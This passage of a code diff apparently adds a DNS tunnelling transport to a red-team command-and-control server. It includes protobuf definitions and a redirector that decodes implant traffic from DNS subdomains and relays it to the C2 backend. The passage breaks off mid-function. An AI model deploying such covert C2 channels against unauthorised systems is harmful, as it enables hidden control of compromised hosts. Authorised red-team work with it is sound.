&file_dns_proto_msgTypes[2] + if x != nil { + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + if ms.LoadMessageInfo() == nil { + 
ms.StoreMessageInfo(mi) + } + return ms + } + return mi.MessageOf(x) +} + +// Deprecated: Use InitPayload.ProtoReflect.Descriptor instead. +func (*InitPayload) Descriptor() ([]byte, []int) { + return file_dns_proto_rawDescGZIP(), []int{2} +} + +func (x *InitPayload) GetMethodCode() string { + if x != nil { + return x.MethodCode + } + return "" +} + +func (x *InitPayload) GetTotalChunks() uint32 { + if x != nil { + return x.TotalChunks + } + return 0 +} + +func (x *InitPayload) GetDataCrc32() uint32 { + if x != nil { + return x.DataCrc32 + } + return 0 +} + +func (x *InitPayload) GetFileSize() uint32 { + if x != nil { + return x.FileSize + } + return 0 +} + +// FetchPayload is the payload for FETCH packets +// It specifies which response chunk to retrieve +type FetchPayload struct { + state protoimpl.MessageState `protogen:"open.v1"` + ChunkIndex uint32 `protobuf:"varint,1,opt,name=chunk_index,json=chunkIndex,proto3" json:"chunk_index,omitempty"` // Which chunk to fetch (1-based) + unknownFields protoimpl.UnknownFields + sizeCache protoimpl.SizeCache +} + +func (x *FetchPayload) Reset() { + *x = FetchPayload{} + mi := &file_dns_proto_msgTypes[3] + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + ms.StoreMessageInfo(mi) +} + +func (x *FetchPayload) String() string { + return protoimpl.X.MessageStringOf(x) +} + +func (*FetchPayload) ProtoMessage() {} + +func (x *FetchPayload) ProtoReflect() protoreflect.Message { + mi := &file_dns_proto_msgTypes[3] + if x != nil { + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + if ms.LoadMessageInfo() == nil { + ms.StoreMessageInfo(mi) + } + return ms + } + return mi.MessageOf(x) +} + +// Deprecated: Use FetchPayload.ProtoReflect.Descriptor instead. 
+func (*FetchPayload) Descriptor() ([]byte, []int) { + return file_dns_proto_rawDescGZIP(), []int{3} +} + +func (x *FetchPayload) GetChunkIndex() uint32 { + if x != nil { + return x.ChunkIndex + } + return 0 +} + +// ResponseMetadata indicates the response is chunked and must be fetched +type ResponseMetadata struct { + state protoimpl.MessageState `protogen:"open.v1"` + TotalChunks uint32 `protobuf:"varint,1,opt,name=total_chunks,json=totalChunks,proto3" json:"total_chunks,omitempty"` // Total number of response chunks + DataCrc32 uint32 `protobuf:"varint,2,opt,name=data_crc32,json=dataCrc32,proto3" json:"data_crc32,omitempty"` // CRC32 checksum of complete response data + ChunkSize uint32 `protobuf:"varint,3,opt,name=chunk_size,json=chunkSize,proto3" json:"chunk_size,omitempty"` // Size of each chunk (last may be smaller) + unknownFields protoimpl.UnknownFields + sizeCache protoimpl.SizeCache +} + +func (x *ResponseMetadata) Reset() { + *x = ResponseMetadata{} + mi := &file_dns_proto_msgTypes[4] + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + ms.StoreMessageInfo(mi) +} + +func (x *ResponseMetadata) String() string { + return protoimpl.X.MessageStringOf(x) +} + +func (*ResponseMetadata) ProtoMessage() {} + +func (x *ResponseMetadata) ProtoReflect() protoreflect.Message { + mi := &file_dns_proto_msgTypes[4] + if x != nil { + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + if ms.LoadMessageInfo() == nil { + ms.StoreMessageInfo(mi) + } + return ms + } + return mi.MessageOf(x) +} + +// Deprecated: Use ResponseMetadata.ProtoReflect.Descriptor instead. 
+func (*ResponseMetadata) Descriptor() ([]byte, []int) { + return file_dns_proto_rawDescGZIP(), []int{4} +} + +func (x *ResponseMetadata) GetTotalChunks() uint32 { + if x != nil { + return x.TotalChunks + } + return 0 +} + +func (x *ResponseMetadata) GetDataCrc32() uint32 { + if x != nil { + return x.DataCrc32 + } + return 0 +} + +func (x *ResponseMetadata) GetChunkSize() uint32 { + if x != nil { + return x.ChunkSize + } + return 0 +} + +var File_dns_proto protoreflect.FileDescriptor + +const file_dns_proto_rawDesc = "" + + "\n" + + "\tdns.proto\x12\x03dns\"\xf9\x01\n" + + "\tDNSPacket\x12#\n" + + "\x04type\x18\x01 \x01(\x0e2\x0f.dns.PacketTypeR\x04type\x12\x1a\n" + + "\bsequence\x18\x02 \x01(\rR\bsequence\x12'\n" + + "\x0fconversation_id\x18\x03 \x01(\tR\x0econversationId\x12\x12\n" + + "\x04data\x18\x04 \x01(\fR\x04data\x12\x14\n" + + "\x05crc32\x18\x05 \x01(\rR\x05crc32\x12\x1f\n" + + "\vwindow_size\x18\x06 \x01(\rR\n" + + "windowSize\x12!\n" + + "\x04acks\x18\a \x03(\v2\r.dns.AckRangeR\x04acks\x12\x14\n" + + "\x05nacks\x18\b \x03(\rR\x05nacks\"@\n" + + "\bAckRange\x12\x1b\n" + + "\tstart_seq\x18\x01 \x01(\rR\bstartSeq\x12\x17\n" + + "\aend_seq\x18\x02 \x01(\rR\x06endSeq\"\x8d\x01\n" + + "\vInitPayload\x12\x1f\n" + + "\vmethod_code\x18\x01 \x01(\tR\n" + + "methodCode\x12!\n" + + "\ftotal_chunks\x18\x02 \x01(\rR\vtotalChunks\x12\x1d\n" + + "\n" + + "data_crc32\x18\x03 \x01(\rR\tdataCrc32\x12\x1b\n" + + "\tfile_size\x18\x04 \x01(\rR\bfileSize\"/\n" + + "\fFetchPayload\x12\x1f\n" + + "\vchunk_index\x18\x01 \x01(\rR\n" + + "chunkIndex\"s\n" + + "\x10ResponseMetadata\x12!\n" + + "\ftotal_chunks\x18\x01 \x01(\rR\vtotalChunks\x12\x1d\n" + + "\n" + + "data_crc32\x18\x02 \x01(\rR\tdataCrc32\x12\x1d\n" + + "\n" + + "chunk_size\x18\x03 \x01(\rR\tchunkSize*\x84\x01\n" + + "\n" + + "PacketType\x12\x1b\n" + + "\x17PACKET_TYPE_UNSPECIFIED\x10\x00\x12\x14\n" + + "\x10PACKET_TYPE_INIT\x10\x01\x12\x14\n" + + "\x10PACKET_TYPE_DATA\x10\x02\x12\x15\n" + + 
"\x11PACKET_TYPE_FETCH\x10\x03\x12\x16\n" + + "\x12PACKET_TYPE_STATUS\x10\x04B$Z\"realm.pub/tavern/internal/c2/dnspbb\x06proto3" + +var ( + file_dns_proto_rawDescOnce sync.Once + file_dns_proto_rawDescData []byte +) + +func file_dns_proto_rawDescGZIP() []byte { + file_dns_proto_rawDescOnce.Do(func() { + file_dns_proto_rawDescData = protoimpl.X.CompressGZIP(unsafe.Slice(unsafe.StringData(file_dns_proto_rawDesc), len(file_dns_proto_rawDesc))) + }) + return file_dns_proto_rawDescData +} + +var file_dns_proto_enumTypes = make([]protoimpl.EnumInfo, 1) +var file_dns_proto_msgTypes = make([]protoimpl.MessageInfo, 5) +var file_dns_proto_goTypes = []any{ + (PacketType)(0), // 0: dns.PacketType + (*DNSPacket)(nil), // 1: dns.DNSPacket + (*AckRange)(nil), // 2: dns.AckRange + (*InitPayload)(nil), // 3: dns.InitPayload + (*FetchPayload)(nil), // 4: dns.FetchPayload + (*ResponseMetadata)(nil), // 5: dns.ResponseMetadata +} +var file_dns_proto_depIdxs = []int32{ + 0, // 0: dns.DNSPacket.type:type_name -> dns.PacketType + 2, // 1: dns.DNSPacket.acks:type_name -> dns.AckRange + 2, // [2:2] is the sub-list for method output_type + 2, // [2:2] is the sub-list for method input_type + 2, // [2:2] is the sub-list for extension type_name + 2, // [2:2] is the sub-list for extension extendee + 0, // [0:2] is the sub-list for field type_name +} + +func init() { file_dns_proto_init() } +func file_dns_proto_init() { + if File_dns_proto != nil { + return + } + type x struct{} + out := protoimpl.TypeBuilder{ + File: protoimpl.DescBuilder{ + GoPackagePath: reflect.TypeOf(x{}).PkgPath(), + RawDescriptor: unsafe.Slice(unsafe.StringData(file_dns_proto_rawDesc), len(file_dns_proto_rawDesc)), + NumEnums: 1, + NumMessages: 5, + NumExtensions: 0, + NumServices: 0, + }, + GoTypes: file_dns_proto_goTypes, + DependencyIndexes: file_dns_proto_depIdxs, + EnumInfos: file_dns_proto_enumTypes, + MessageInfos: file_dns_proto_msgTypes, + }.Build() + File_dns_proto = out.File + file_dns_proto_goTypes = nil + 
file_dns_proto_depIdxs = nil +} diff --git a/tavern/internal/c2/generate.go b/tavern/internal/c2/generate.go index d8238b97c..31f03d2b5 100644 --- a/tavern/internal/c2/generate.go +++ b/tavern/internal/c2/generate.go @@ -2,3 +2,4 @@ package c2 //go:generate protoc -I=./proto --go_out=./epb --go_opt=paths=source_relative --go-grpc_out=./epb --go-grpc_opt=paths=source_relative eldritch.proto //go:generate protoc -I=./proto --go_out=./c2pb --go_opt=paths=source_relative --go-grpc_out=./c2pb --go-grpc_opt=paths=source_relative c2.proto +//go:generate protoc -I=./proto --go_out=./dnspb --go_opt=paths=source_relative dns.proto diff --git a/tavern/internal/c2/proto/c2.proto b/tavern/internal/c2/proto/c2.proto index 8fc5cf5b3..8ef213c85 100644 --- a/tavern/internal/c2/proto/c2.proto +++ b/tavern/internal/c2/proto/c2.proto @@ -29,6 +29,7 @@ message Beacon { TRANSPORT_UNSPECIFIED = 0; TRANSPORT_GRPC = 1; TRANSPORT_HTTP1 = 2; + TRANSPORT_DNS = 3; } Transport transport = 6; diff --git a/tavern/internal/c2/proto/dns.proto b/tavern/internal/c2/proto/dns.proto new file mode 100644 index 000000000..308b87254 --- /dev/null +++ b/tavern/internal/c2/proto/dns.proto @@ -0,0 +1,57 @@ +syntax = "proto3"; + +package dns; + +option go_package = "realm.pub/tavern/internal/c2/dnspb"; + +// PacketType defines the type of DNS packet in the conversation +enum PacketType { + PACKET_TYPE_UNSPECIFIED = 0; + PACKET_TYPE_INIT = 1; // Establish conversation + PACKET_TYPE_DATA = 2; // Send data chunk + PACKET_TYPE_FETCH = 3; // Retrieve response chunk + PACKET_TYPE_STATUS = 4; // Server status response with ACKs/NACKs +} + +// DNSPacket is the main message format for DNS C2 communication +// It is serialized to protobuf, then encoded (Base64/Base58/Base32), and sent as DNS subdomain +message DNSPacket { + PacketType type = 1; // Packet type + uint32 sequence = 2; // Chunk sequence number (0-Based for INIT, 1-based for DATA) + string conversation_id = 3; // 8-character random conversation ID + bytes 
data = 4; // Chunk payload (or InitPayload for INIT packets) + uint32 crc32 = 5; // Optional CRC32 for validation + + // Async protocol fields for windowed transmission + uint32 window_size = 6; // Number of packets client has in-flight + repeated AckRange acks = 7; // Ranges of successfully received chunks (SACK) + repeated uint32 nacks = 8; // Specific sequence numbers to retransmit +} + +// AckRange represents a contiguous range of acknowledged sequence numbers +message AckRange { + uint32 start_seq = 1; // Inclusive start of range + uint32 end_seq = 2; // Inclusive end of range +} + +// InitPayload is the payload for INIT packets +// It contains metadata about the upcoming data transmission +message InitPayload { + string method_code = 1; // 2-character gRPC method code (e.g., "ct", "fa") + uint32 total_chunks = 2; // Total number of data chunks to expect + uint32 data_crc32 = 3; // CRC32 checksum of complete request data + uint32 file_size = 4; // Total size of the file/data in bytes +} + +// FetchPayload is the payload for FETCH packets +// It specifies which response chunk to retrieve +message FetchPayload { + uint32 chunk_index = 1; // Which chunk to fetch (1-based) +} + +// ResponseMetadata indicates the response is chunked and must be fetched +message ResponseMetadata { + uint32 total_chunks = 1; // Total number of response chunks + uint32 data_crc32 = 2; // CRC32 checksum of complete response data + uint32 chunk_size = 3; // Size of each chunk (last may be smaller) +} diff --git a/tavern/internal/ent/beacon/beacon.go b/tavern/internal/ent/beacon/beacon.go index d899a6428..d0803c2cb 100644 --- a/tavern/internal/ent/beacon/beacon.go +++ b/tavern/internal/ent/beacon/beacon.go @@ -128,7 +128,7 @@ var ( // TransportValidator is a validator for the "transport" field enum values. It is called by the builders before save. 
func TransportValidator(t c2pb.Beacon_Transport) error { switch t.String() { - case "TRANSPORT_GRPC", "TRANSPORT_HTTP1", "TRANSPORT_UNSPECIFIED": + case "TRANSPORT_GRPC", "TRANSPORT_HTTP1", "TRANSPORT_DNS", "TRANSPORT_UNSPECIFIED": return nil default: return fmt.Errorf("beacon: invalid enum value for transport field: %q", t) diff --git a/tavern/internal/ent/migrate/schema.go b/tavern/internal/ent/migrate/schema.go index d1a262d48..78c9db8ba 100644 --- a/tavern/internal/ent/migrate/schema.go +++ b/tavern/internal/ent/migrate/schema.go @@ -21,7 +21,7 @@ var ( {Name: "last_seen_at", Type: field.TypeTime, Nullable: true}, {Name: "next_seen_at", Type: field.TypeTime, Nullable: true}, {Name: "interval", Type: field.TypeUint64, Nullable: true}, - {Name: "transport", Type: field.TypeEnum, Enums: []string{"TRANSPORT_GRPC", "TRANSPORT_HTTP1", "TRANSPORT_UNSPECIFIED"}}, + {Name: "transport", Type: field.TypeEnum, Enums: []string{"TRANSPORT_GRPC", "TRANSPORT_HTTP1", "TRANSPORT_DNS", "TRANSPORT_UNSPECIFIED"}}, {Name: "beacon_host", Type: field.TypeInt}, } // BeaconsTable holds the schema information for the "beacons" table. 
diff --git a/tavern/internal/redirectors/dns/dns.go b/tavern/internal/redirectors/dns/dns.go new file mode 100644 index 000000000..55269f055 --- /dev/null +++ b/tavern/internal/redirectors/dns/dns.go @@ -0,0 +1,906 @@ +package dns + +import ( + "context" + "encoding/base32" + "encoding/binary" + "errors" + "fmt" + "hash/crc32" + "io" + "log/slog" + "net" + "net/url" + "sort" + "strings" + "sync" + "sync/atomic" + "time" + + "google.golang.org/grpc" + "google.golang.org/grpc/metadata" + "google.golang.org/protobuf/proto" + "realm.pub/tavern/internal/c2/dnspb" + "realm.pub/tavern/internal/redirectors" +) + +const ( + convTimeout = 15 * time.Minute + defaultUDPPort = "53" + + // DNS protocol constants + dnsHeaderSize = 12 + maxLabelLength = 63 + txtRecordType = 16 + aRecordType = 1 + aaaaRecordType = 28 + dnsClassIN = 1 + dnsTTLSeconds = 60 + + // DNS response flags + dnsResponseFlags = 0x8180 + dnsErrorFlags = 0x8183 + dnsPointer = 0xC00C + + txtMaxChunkSize = 255 + + // Benign DNS response configuration + // IP address returned for non-C2 A record queries to avoid NXDOMAIN responses + // which can interfere with recursive DNS lookups (e.g., Cloudflare) + benignARecordIP = "0.0.0.0" + + // Async protocol configuration + MaxActiveConversations = 10000 + NormalConversationTimeout = 15 * time.Minute + ReducedConversationTimeout = 5 * time.Minute + CapacityRecoveryThreshold = 0.5 // 50% + MaxAckRangesInResponse = 20 + MaxNacksInResponse = 50 + MaxDataSize = 50 * 1024 * 1024 // 50MB max data size +) + +func init() { + redirectors.Register("dns", &Redirector{}) +} + +// Redirector handles DNS-based C2 communication +type Redirector struct { + conversations sync.Map + baseDomains []string + conversationCount int32 + conversationTimeout time.Duration +} + +// Conversation tracks state for a request-response exchange +type Conversation struct { + mu sync.Mutex + ID string + MethodPath string + TotalChunks uint32 + ExpectedCRC uint32 + ExpectedDataSize uint32 // Data size 
provided by client + Chunks map[uint32][]byte + LastActivity time.Time + ResponseData []byte + ResponseChunks [][]byte // Split response for multi-fetch + ResponseCRC uint32 + Completed bool // Set to true when all chunks received +} + +func (r *Redirector) Redirect(ctx context.Context, listenOn string, upstream *grpc.ClientConn) error { + listenAddr, domains, err := ParseListenAddr(listenOn) + if err != nil { + return fmt.Errorf("failed to parse listen address: %w", err) + } + + if len(domains) == 0 { + return fmt.Errorf("no base domains specified in listenOn parameter") + } + + r.baseDomains = domains + r.conversationTimeout = NormalConversationTimeout + + udpAddr, err := net.ResolveUDPAddr("udp", listenAddr) + if err != nil { + return fmt.Errorf("failed to resolve UDP address: %w", err) + } + + conn, err := net.ListenUDP("udp", udpAddr) + if err != nil { + return fmt.Errorf("failed to listen on UDP: %w", err) + } + defer conn.Close() + + slog.Info("DNS redirector started", "listen_on", listenAddr, "base_domains", r.baseDomains) + + go r.cleanupConversations(ctx) + + buf := make([]byte, 4096) + for { + select { + case <-ctx.Done(): + return ctx.Err() + default: + conn.SetReadDeadline(time.Now().Add(1 * time.Second)) + + n, addr, err := conn.ReadFromUDP(buf) + if err != nil { + if netErr, ok := err.(net.Error); ok && netErr.Timeout() { + continue + } + slog.Error("failed to read UDP", "error", err) + continue + } + + // Process query synchronously + queryCopy := make([]byte, n) + copy(queryCopy, buf[:n]) + r.handleDNSQuery(ctx, conn, addr, queryCopy, upstream) + } + } +} + +// ParseListenAddr extracts address and domain parameters from listenOn string +func ParseListenAddr(listenOn string) (string, []string, error) { + parts := strings.SplitN(listenOn, "?", 2) + addr := parts[0] + + if !strings.Contains(addr, ":") { + addr = net.JoinHostPort(addr, defaultUDPPort) + } + + if len(parts) == 1 { + return addr, nil, nil + } + + queryParams := parts[1] + domains := 
[]string{} + + for _, param := range strings.Split(queryParams, "&") { + kv := strings.SplitN(param, "=", 2) + if len(kv) != 2 { + continue + } + + key := kv[0] + value := kv[1] + + if key == "domain" && value != "" { + decoded, err := url.QueryUnescape(value) + if err != nil { + return "", nil, fmt.Errorf("failed to decode domain: %w", err) + } + domains = append(domains, decoded) + } + } + + return addr, domains, nil +} + +func (r *Redirector) cleanupConversations(ctx context.Context) { + ticker := time.NewTicker(1 * time.Minute) + defer ticker.Stop() + + for { + select { + case <-ctx.Done(): + return + case <-ticker.C: + now := time.Now() + count := atomic.LoadInt32(&r.conversationCount) + + // Adjust timeout based on capacity + if count >= MaxActiveConversations { + r.conversationTimeout = ReducedConversationTimeout + } else if float64(count) < float64(MaxActiveConversations)*CapacityRecoveryThreshold { + r.conversationTimeout = NormalConversationTimeout + } + + r.conversations.Range(func(key, value interface{}) bool { + conv := value.(*Conversation) + conv.mu.Lock() + if now.Sub(conv.LastActivity) > r.conversationTimeout { + r.conversations.Delete(key) + atomic.AddInt32(&r.conversationCount, -1) + } + conv.mu.Unlock() + return true + }) + } + } +} + +func (r *Redirector) handleDNSQuery(ctx context.Context, conn *net.UDPConn, addr *net.UDPAddr, query []byte, upstream *grpc.ClientConn) { + if len(query) < dnsHeaderSize { + slog.Debug("query too short") + return + } + + transactionID := binary.BigEndian.Uint16(query[0:2]) + + domain, queryType, err := r.parseDomainNameAndType(query[dnsHeaderSize:]) + if err != nil { + slog.Debug("failed to parse domain", "error", err) + return + } + + domain = strings.ToLower(domain) + + slog.Debug("received DNS query", "domain", domain, "query_type", queryType, "from", addr.String()) + + // Extract subdomain + subdomain, err := r.extractSubdomain(domain) + if err != nil { + slog.Debug("domain doesn't match base domains", 
"domain", domain) + r.sendErrorResponse(conn, addr, transactionID) + return + } + + // Decode packet + packet, err := r.decodePacket(subdomain) + if err != nil { + slog.Debug("ignoring non-C2 query", "domain", domain, "error", err) + + // For A record queries, return benign IP instead of NXDOMAIN + // Cloudflare does recursive lookups on subdomain components - if we return NXDOMAIN + // for the parent subdomain, it won't forward the full TXT query + if queryType == aRecordType { + slog.Debug("returning benign A record for non-C2 subdomain", "domain", domain) + r.sendDNSResponse(conn, addr, transactionID, domain, queryType, net.ParseIP(benignARecordIP).To4()) + return + } + + // For other types, return NXDOMAIN + r.sendErrorResponse(conn, addr, transactionID) + return + } + + // Validate packet type before processing + if packet.Type == dnspb.PacketType_PACKET_TYPE_UNSPECIFIED { + slog.Debug("ignoring packet with unspecified type", "domain", domain) + + if queryType == aRecordType { + r.sendDNSResponse(conn, addr, transactionID, domain, queryType, net.ParseIP(benignARecordIP).To4()) + return + } + + r.sendErrorResponse(conn, addr, transactionID) + return + } + + slog.Debug("parsed packet", "type", packet.Type, "seq", packet.Sequence, "conv_id", packet.ConversationId) + + // Handle packet based on type + var responseData []byte + switch packet.Type { + case dnspb.PacketType_PACKET_TYPE_INIT: + responseData, err = r.handleInitPacket(packet) + case dnspb.PacketType_PACKET_TYPE_DATA: + responseData, err = r.handleDataPacket(ctx, upstream, packet, queryType) + case dnspb.PacketType_PACKET_TYPE_FETCH: + responseData, err = r.handleFetchPacket(packet) + default: + err = fmt.Errorf("unknown packet type: %d", packet.Type) + } + + if err != nil { + slog.Warn("packet handling failed", "type", packet.Type, "conv_id", packet.ConversationId, "error", err) + r.sendErrorResponse(conn, addr, transactionID) + return + } + + r.sendDNSResponse(conn, addr, transactionID, domain, 
queryType, responseData) +} + +func (r *Redirector) extractSubdomain(domain string) (string, error) { + domainParts := strings.Split(domain, ".") + + for _, baseDomain := range r.baseDomains { + baseDomainParts := strings.Split(baseDomain, ".") + + if len(domainParts) <= len(baseDomainParts) { + continue + } + + domainSuffix := domainParts[len(domainParts)-len(baseDomainParts):] + matched := true + for i, part := range baseDomainParts { + if !strings.EqualFold(part, domainSuffix[i]) { + matched = false + break + } + } + + if matched { + subdomainParts := domainParts[:len(domainParts)-len(baseDomainParts)] + return strings.Join(subdomainParts, "."), nil + } + } + + return "", fmt.Errorf("no matching base domain") +} + +func (r *Redirector) decodePacket(subdomain string) (*dnspb.DNSPacket, error) { + encodedData := strings.ReplaceAll(subdomain, ".", "") + + packetData, err := base32.StdEncoding.WithPadding(base32.NoPadding).DecodeString(strings.ToUpper(encodedData)) + if err != nil { + return nil, fmt.Errorf("failed to decode Base32 data: %w", err) + } + + var packet dnspb.DNSPacket + if err := proto.Unmarshal(packetData, &packet); err != nil { + return nil, fmt.Errorf("failed to unmarshal protobuf: %w", err) + } + + // Verify CRC for data packets + if packet.Type == dnspb.PacketType_PACKET_TYPE_DATA && len(packet.Data) > 0 { + actualCRC := crc32.ChecksumIEEE(packet.Data) + if actualCRC != packet.Crc32 { + return nil, fmt.Errorf("CRC mismatch: expected %d, got %d", packet.Crc32, actualCRC) + } + } + + return &packet, nil +} + +// handleInitPacket processes INIT packet +func (r *Redirector) handleInitPacket(packet *dnspb.DNSPacket) ([]byte, error) { + for { + current := atomic.LoadInt32(&r.conversationCount) + if current >= MaxActiveConversations { + return nil, fmt.Errorf("max active conversations reached: %d", current) + } + if atomic.CompareAndSwapInt32(&r.conversationCount, current, current+1) { + break + } + } + + var initPayload dnspb.InitPayload + if err := 
proto.Unmarshal(packet.Data, &initPayload); err != nil { + atomic.AddInt32(&r.conversationCount, -1) + return nil, fmt.Errorf("failed to unmarshal init payload: %w", err) + } + + // Validate file size from client + if initPayload.FileSize > MaxDataSize { + atomic.AddInt32(&r.conversationCount, -1) + return nil, fmt.Errorf("data size exceeds maximum: %d > %d bytes", initPayload.FileSize, MaxDataSize) + } + + if initPayload.FileSize == 0 && initPayload.TotalChunks > 0 { + slog.Warn("INIT packet missing file_size field", "conv_id", packet.ConversationId, "total_chunks", initPayload.TotalChunks) + } + + slog.Debug("creating conversation", "conv_id", packet.ConversationId, "method", initPayload.MethodCode, + "total_chunks", initPayload.TotalChunks, "file_size", initPayload.FileSize, "crc32", initPayload.DataCrc32) + + conv := &Conversation{ + ID: packet.ConversationId, + MethodPath: initPayload.MethodCode, + TotalChunks: initPayload.TotalChunks, + ExpectedCRC: initPayload.DataCrc32, + ExpectedDataSize: initPayload.FileSize, + Chunks: make(map[uint32][]byte), + LastActivity: time.Now(), + Completed: false, + } + + r.conversations.Store(packet.ConversationId, conv) + + slog.Debug("C2 conversation started", "conv_id", conv.ID, "method", conv.MethodPath, + "total_chunks", conv.TotalChunks, "data_size", initPayload.FileSize) + + statusPacket := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_STATUS, + ConversationId: packet.ConversationId, + Acks: []*dnspb.AckRange{}, + Nacks: []uint32{}, + } + statusData, err := proto.Marshal(statusPacket) + if err != nil { + atomic.AddInt32(&r.conversationCount, -1) + r.conversations.Delete(packet.ConversationId) + return nil, fmt.Errorf("failed to marshal init status: %w", err) + } + return statusData, nil +} + +// handleDataPacket processes DATA packet +func (r *Redirector) handleDataPacket(ctx context.Context, upstream *grpc.ClientConn, packet *dnspb.DNSPacket, queryType uint16) ([]byte, error) { + val, ok := 
r.conversations.Load(packet.ConversationId) + if !ok { + slog.Debug("DATA packet for unknown conversation (INIT may be lost/delayed)", + "conv_id", packet.ConversationId, "seq", packet.Sequence) + return nil, fmt.Errorf("conversation not found: %s", packet.ConversationId) + } + + conv := val.(*Conversation) + conv.mu.Lock() + defer conv.mu.Unlock() + + if packet.Sequence < 1 || packet.Sequence > conv.TotalChunks { + return nil, fmt.Errorf("sequence out of bounds: %d (expected 1-%d)", packet.Sequence, conv.TotalChunks) + } + + conv.Chunks[packet.Sequence] = packet.Data + conv.LastActivity = time.Now() + + slog.Debug("received chunk", "conv_id", conv.ID, "seq", packet.Sequence, "size", len(packet.Data), "total", len(conv.Chunks)) + + if uint32(len(conv.Chunks)) == conv.TotalChunks && !conv.Completed { + conv.Completed = true + slog.Debug("C2 request complete, forwarding to upstream", "conv_id", conv.ID, + "method", conv.MethodPath, "total_chunks", conv.TotalChunks, "data_size", conv.ExpectedDataSize) + + conv.mu.Unlock() + if err := r.processCompletedConversation(ctx, upstream, conv, queryType); err != nil { + slog.Error("failed to process completed conversation", "conv_id", conv.ID, "error", err) + } + conv.mu.Lock() + } + + acks, nacks := r.computeAcksNacks(conv) + + statusPacket := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_STATUS, + ConversationId: packet.ConversationId, + Acks: acks, + Nacks: nacks, + } + + statusData, err := proto.Marshal(statusPacket) + if err != nil { + return nil, fmt.Errorf("failed to marshal status packet: %w", err) + } + + return statusData, nil +} + +// processCompletedConversation reassembles data, verifies CRC, forwards to upstream, and stores response +func (r *Redirector) processCompletedConversation(ctx context.Context, upstream *grpc.ClientConn, conv *Conversation, queryType uint16) error { + conv.mu.Lock() + defer conv.mu.Unlock() + + // Reassemble data + var fullData []byte + for i := uint32(1); i <= conv.TotalChunks; 
i++ { + chunk, ok := conv.Chunks[i] + if !ok { + return fmt.Errorf("missing chunk %d", i) + } + fullData = append(fullData, chunk...) + } + + actualCRC := crc32.ChecksumIEEE(fullData) + if actualCRC != conv.ExpectedCRC { + r.conversations.Delete(conv.ID) + atomic.AddInt32(&r.conversationCount, -1) + return fmt.Errorf("data CRC mismatch: expected %d, got %d", conv.ExpectedCRC, actualCRC) + } + + slog.Debug("reassembled data", "conv_id", conv.ID, "size", len(fullData), "method", conv.MethodPath) + + if conv.ExpectedDataSize > 0 && uint32(len(fullData)) != conv.ExpectedDataSize { + r.conversations.Delete(conv.ID) + atomic.AddInt32(&r.conversationCount, -1) + return fmt.Errorf("reassembled data size mismatch: expected %d bytes, got %d bytes", conv.ExpectedDataSize, len(fullData)) + } + + responseData, err := r.forwardToUpstream(ctx, upstream, conv.MethodPath, fullData) + if err != nil { + r.conversations.Delete(conv.ID) + atomic.AddInt32(&r.conversationCount, -1) + return fmt.Errorf("failed to forward to upstream: %w", err) + } + + var maxSize int + switch queryType { + case txtRecordType: + maxSize = 400 + case aRecordType: + maxSize = 64 + case aaaaRecordType: + maxSize = 128 + default: + maxSize = 400 + } + + if len(responseData) > maxSize { + conv.ResponseCRC = crc32.ChecksumIEEE(responseData) + conv.ResponseData = responseData + + conv.ResponseChunks = nil + for i := 0; i < len(responseData); i += maxSize { + end := i + maxSize + if end > len(responseData) { + end = len(responseData) + } + conv.ResponseChunks = append(conv.ResponseChunks, responseData[i:end]) + } + + conv.LastActivity = time.Now() + + slog.Debug("response chunked", "conv_id", conv.ID, "total_size", len(responseData), + "chunks", len(conv.ResponseChunks), "crc32", conv.ResponseCRC) + } else { + conv.ResponseData = responseData + conv.LastActivity = time.Now() + + slog.Debug("stored response", "conv_id", conv.ID, "size", len(responseData)) + } + + return nil +} + +// computeAcksNacks computes ACK 
ranges and NACK list for a conversation +// Must be called with conv.mu locked +func (r *Redirector) computeAcksNacks(conv *Conversation) ([]*dnspb.AckRange, []uint32) { + received := make([]uint32, 0, len(conv.Chunks)) + for seq := range conv.Chunks { + received = append(received, seq) + } + sort.Slice(received, func(i, j int) bool { return received[i] < received[j] }) + + // Compute ACK ranges + acks := []*dnspb.AckRange{} + if len(received) > 0 { + start := received[0] + end := received[0] + + for i := 1; i < len(received); i++ { + if received[i] == end+1 { + end = received[i] + } else { + acks = append(acks, &dnspb.AckRange{StartSeq: start, EndSeq: end}) + start = received[i] + end = received[i] + } + } + acks = append(acks, &dnspb.AckRange{StartSeq: start, EndSeq: end}) + } + + if len(acks) > MaxAckRangesInResponse { + acks = acks[:MaxAckRangesInResponse] + } + + nacks := []uint32{} + + if len(received) > 0 { + minReceived := received[0] + maxReceived := received[len(received)-1] + + receivedSet := make(map[uint32]bool) + for _, seq := range received { + receivedSet[seq] = true + } + + for seq := minReceived; seq <= maxReceived; seq++ { + if !receivedSet[seq] { + nacks = append(nacks, seq) + if len(nacks) >= MaxNacksInResponse { + break + } + } + } + } + + return acks, nacks +} + +// handleFetchPacket processes FETCH packet +func (r *Redirector) handleFetchPacket(packet *dnspb.DNSPacket) ([]byte, error) { + val, ok := r.conversations.Load(packet.ConversationId) + if !ok { + return nil, fmt.Errorf("conversation not found: %s", packet.ConversationId) + } + + conv := val.(*Conversation) + conv.mu.Lock() + defer conv.mu.Unlock() + + if conv.ResponseData == nil { + return nil, fmt.Errorf("no response data available") + } + + conv.LastActivity = time.Now() + + if len(conv.ResponseChunks) > 0 { + if len(packet.Data) == 0 { + metadata := &dnspb.ResponseMetadata{ + TotalChunks: uint32(len(conv.ResponseChunks)), + DataCrc32: conv.ResponseCRC, + ChunkSize: 
